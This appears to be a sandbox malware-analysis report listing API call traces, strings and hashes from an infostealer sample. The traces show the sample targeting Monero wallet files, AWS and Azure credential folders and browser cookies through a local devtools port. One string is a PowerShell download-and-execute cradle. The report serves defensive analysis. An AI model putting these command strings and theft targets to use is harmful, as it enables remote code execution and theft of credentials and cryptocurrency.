                              • lstrlen.KERNEL32(?), ref: 005910AD
                              • lstrcat.KERNEL32(?,.keys), ref: 005910C8
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005910FF
                              • lstrlen.KERNEL32(016095F8), ref: 0059110D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591131
                              • lstrcat.KERNEL32(00000000,016095F8), ref: 00591139
                              • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00591144
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591168
                              • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00591174
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059119A
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005911DF
                              • lstrlen.KERNEL32(0160DAC8), ref: 005911EE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591215
                              • lstrcat.KERNEL32(00000000,?), ref: 0059121D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591258
                              • lstrcat.KERNEL32(00000000), ref: 00591265
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059128C
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 005912B5
                              • lstrcpy.KERNEL32(00000000,?), ref: 005912E1
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059131D
                                • Part of subcall function 005AEF30: lstrcpy.KERNEL32(00000000,?), ref: 005AEF62
                              • DeleteFileA.KERNEL32(?), ref: 00591351
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                              • String ID: .keys$\Monero\wallet.keys
                              • API String ID: 2881711868-3586502688
                              • Opcode ID: 10e713bd2c4481e6d2c5cee9c700c2c3babb0601c5eb29e46710b416cee8d2b3
                              • Instruction ID: 7862a5530c3e69373c3bd4ec5fea31d1f1d3721692ac32eca37945edcb76c4a7
                              • Opcode Fuzzy Hash: 10e713bd2c4481e6d2c5cee9c700c2c3babb0601c5eb29e46710b416cee8d2b3
                              • Instruction Fuzzy Hash: DFA15F71A1161BABCF10ABB5DC4DAAE7FB8BF44700F444428F905E7251DB34ED418BA9
                              APIs
                              • memset.MSVCRT ref: 005AE8A1
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 005AE8CE
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE900
                              • lstrcat.KERNEL32(?,00000000), ref: 005AE90C
                              • lstrcat.KERNEL32(?,\.azure\), ref: 005AE923
                              • memset.MSVCRT ref: 005AE961
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 005AE98C
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE9C0
                              • lstrcat.KERNEL32(?,00000000), ref: 005AE9CC
                              • lstrcat.KERNEL32(?,\.aws\), ref: 005AE9E3
                              • memset.MSVCRT ref: 005AEA21
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 005AEA51
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AEA82
                              • lstrcat.KERNEL32(?,00000000), ref: 005AEA8E
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 005AEAA5
                              • memset.MSVCRT ref: 005AEAE3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$memset$FolderPathlstrcpy
                              • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 4067350539-3645552435
                              • Opcode ID: f13c260db7aeacf8118332092970e80d80f27dffae9224ff47949370abfc4565
                              • Instruction ID: e0f49ed3c3afdcd7fedc2ed0c388f890efe32008437a08527ad3e291e30deccf
                              • Opcode Fuzzy Hash: f13c260db7aeacf8118332092970e80d80f27dffae9224ff47949370abfc4565
                              • Instruction Fuzzy Hash: 3961A631614315BFD760EBA4DC4FFDE7BA4FFC4700F408818B68997181EA74A9498796
                              APIs
                              • LoadLibraryA.KERNEL32(ws2_32.dll,?,005A7741), ref: 005B4806
                              • GetProcAddress.KERNEL32(00000000,connect), ref: 005B481C
                              • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 005B482D
                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 005B483E
                              • GetProcAddress.KERNEL32(00000000,htons), ref: 005B484F
                              • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 005B4860
                              • GetProcAddress.KERNEL32(00000000,recv), ref: 005B4871
                              • GetProcAddress.KERNEL32(00000000,socket), ref: 005B4882
                              • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 005B4893
                              • GetProcAddress.KERNEL32(00000000,closesocket), ref: 005B48A4
                              • GetProcAddress.KERNEL32(00000000,send), ref: 005B48B5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                              • API String ID: 2238633743-3087812094
                              • Opcode ID: 606a35de01a6a74a4b7809bc9495fcd8f796cc8fc3e4429ba5b1f86b3e901a45
                              • Instruction ID: e056fb39e500397797963f217e2057ddbfef7961149e99f3914a97ce6b94f50a
                              • Opcode Fuzzy Hash: 606a35de01a6a74a4b7809bc9495fcd8f796cc8fc3e4429ba5b1f86b3e901a45
                              • Instruction Fuzzy Hash: 24116671951721EF87909BF4AC4DF5A3FF8FA19785308881EB251D2160FAB860C0EB99
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005ABEB3
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005ABEE6
                              • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 005ABEF1
                              • lstrcpy.KERNEL32(00000000,?), ref: 005ABF11
                              • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 005ABF1D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005ABF40
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005ABF4B
                              • lstrlen.KERNEL32(')"), ref: 005ABF56
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005ABF73
                              • lstrcat.KERNEL32(00000000,')"), ref: 005ABF7F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005ABFA6
                              • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 005ABFC6
                              • lstrcpy.KERNEL32(00000000,?), ref: 005ABFE8
                              • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 005ABFF4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AC01A
                              • ShellExecuteEx.SHELL32(?), ref: 005AC06C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 4016326548-898575020
                              • Opcode ID: 5f1e44fd4866449f7e862682593be2b2d1b2e072e8b4edac5c2a7c70955427c2
                              • Instruction ID: d63400d371e12b93b960b6570766a55ba7d2e46ea23f0378e366d40b99d09b28
                              • Opcode Fuzzy Hash: 5f1e44fd4866449f7e862682593be2b2d1b2e072e8b4edac5c2a7c70955427c2
                              • Instruction Fuzzy Hash: B1617171A1121AAFDF21AFB58C8DAAF7FB8BF45700F044429F905D7212EB34D9458B91
                              APIs
                              • lstrcpy.KERNEL32 ref: 005AAC2F
                              • lstrlen.KERNEL32(0160E580), ref: 005AAC45
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AAC6D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005AAC78
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AACA1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AACE4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005AACEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AAD17
                              • lstrlen.KERNEL32(005C509C), ref: 005AAD31
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AAD53
                              • lstrcat.KERNEL32(00000000,005C509C), ref: 005AAD5F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AAD88
                              • lstrlen.KERNEL32(005C509C), ref: 005AAD9A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AADBC
                              • lstrcat.KERNEL32(00000000,005C509C), ref: 005AADC8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AADF1
                              • lstrlen.KERNEL32(0160E6B8), ref: 005AAE07
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AAE2F
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005AAE3A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AAE63
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AAE9F
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005AAEA9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AAECF
                              • lstrlen.KERNEL32(00000000), ref: 005AAEE5
                              • lstrcpy.KERNEL32(00000000,0160E568), ref: 005AAF18
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen
                              • String ID:
                              • API String ID: 2762123234-0
                              • Opcode ID: b527965a936196afd83c76ad3cc01b1e7a7a5a3d565698d2f564eb421011e984
                              • Instruction ID: a478ba070e1284e4f21ed8654348980d86bd901f16bd980985f895261a4ccddc
                              • Opcode Fuzzy Hash: b527965a936196afd83c76ad3cc01b1e7a7a5a3d565698d2f564eb421011e984
                              • Instruction Fuzzy Hash: 79B13C3091261BABDB21EBA4CC4DAAF7FB9FF81701F044528B91597261DB38DD41CB91
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B182F
                              • lstrlen.KERNEL32(015F6ED8), ref: 005B1840
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1867
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005B1872
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B18A1
                              • lstrlen.KERNEL32(005C5568), ref: 005B18B3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B18D4
                              • lstrcat.KERNEL32(00000000,005C5568), ref: 005B18E0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B190F
                              • lstrlen.KERNEL32(015F6D88), ref: 005B1925
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B194C
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005B1957
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1986
                              • lstrlen.KERNEL32(005C5568), ref: 005B1998
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B19B9
                              • lstrcat.KERNEL32(00000000,005C5568), ref: 005B19C5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B19F4
                              • lstrlen.KERNEL32(015F6DA8), ref: 005B1A0A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1A31
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005B1A3C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1A6B
                              • lstrlen.KERNEL32(015F6DB8), ref: 005B1A81
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1AA8
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005B1AB3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1AE2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen
                              • String ID:
                              • API String ID: 1049500425-0
                              • Opcode ID: c5caef18a75150d7220bb8371438f54c69ec6d290ac6983659ffb44181f564f1
                              • Instruction ID: 546e26561707bf781686f9079551010458c05ef726807dc13f814412c9e606f6
                              • Opcode Fuzzy Hash: c5caef18a75150d7220bb8371438f54c69ec6d290ac6983659ffb44181f564f1
                              • Instruction Fuzzy Hash: 38911F71601B07ABDB60AFB5DC9DA6BBBE8BF44340F54882DB985C3251DB34E8418B64
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4B43
                              • LocalAlloc.KERNEL32(00000040,?), ref: 005A4B75
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A4BC2
                              • lstrlen.KERNEL32(005C5128), ref: 005A4BCD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4BEA
                              • lstrcat.KERNEL32(00000000,005C5128), ref: 005A4BF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4C1B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4C48
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A4C53
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4C7A
                              • StrStrA.SHLWAPI(?,00000000), ref: 005A4C8C
                              • lstrlen.KERNEL32(?), ref: 005A4CA0
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A4CE1
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4D68
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4D91
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4DBA
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4DE0
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4E0D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 4107348322-3310892237
                              • Opcode ID: 74b266c6ce6e46526b3dd15977a3b2dc83501fa193e17708d3c1766b44a8a926
                              • Instruction ID: 89ab21f28d33674b1553ce34c0793d120bb05ef45ca965fd32f8d912b83cbbb8
                              • Opcode Fuzzy Hash: 74b266c6ce6e46526b3dd15977a3b2dc83501fa193e17708d3c1766b44a8a926
                              • Instruction Fuzzy Hash: 18B16031A1220BABCF24EFB9D98DAAE7FB5BF85700F044528F94597211DB74EC458B90
                              APIs
                                • Part of subcall function 005990F0: InternetOpenA.WININET(005BD014,00000001,00000000,00000000,00000000), ref: 0059910F
                                • Part of subcall function 005990F0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0059912C
                                • Part of subcall function 005990F0: InternetCloseHandle.WININET(00000000), ref: 00599139
                              • strlen.MSVCRT ref: 00599311
                              • strlen.MSVCRT ref: 0059932A
                                • Part of subcall function 005989B0: std::_Xinvalid_argument.LIBCPMT ref: 005989C6
                              • strlen.MSVCRT ref: 005993C9
                              • strlen.MSVCRT ref: 00599416
                              • lstrcat.KERNEL32(?,cookies), ref: 00599577
                              • lstrcat.KERNEL32(?,005C1D5C), ref: 00599589
                              • lstrcat.KERNEL32(?,?), ref: 0059959A
                              • lstrcat.KERNEL32(?,005C5160), ref: 005995AC
                              • lstrcat.KERNEL32(?,?), ref: 005995BD
                              • lstrcat.KERNEL32(?,.txt), ref: 005995CF
                              • lstrlen.KERNEL32(?), ref: 005995E6
                              • lstrlen.KERNEL32(?), ref: 0059960B
                              • lstrcpy.KERNEL32(00000000,?), ref: 00599644
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                              • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                              • API String ID: 1201316467-3542011879
                              • Opcode ID: 598c1c6ec98d3092944356e9d1586828b93490339e41234d1856ab12a5a883a9
                              • Instruction ID: 13c669497e595a0f63f916626ad44b37a8e313f6e89b1b4f1e9475879a875c7a
                              • Opcode Fuzzy Hash: 598c1c6ec98d3092944356e9d1586828b93490339e41234d1856ab12a5a883a9
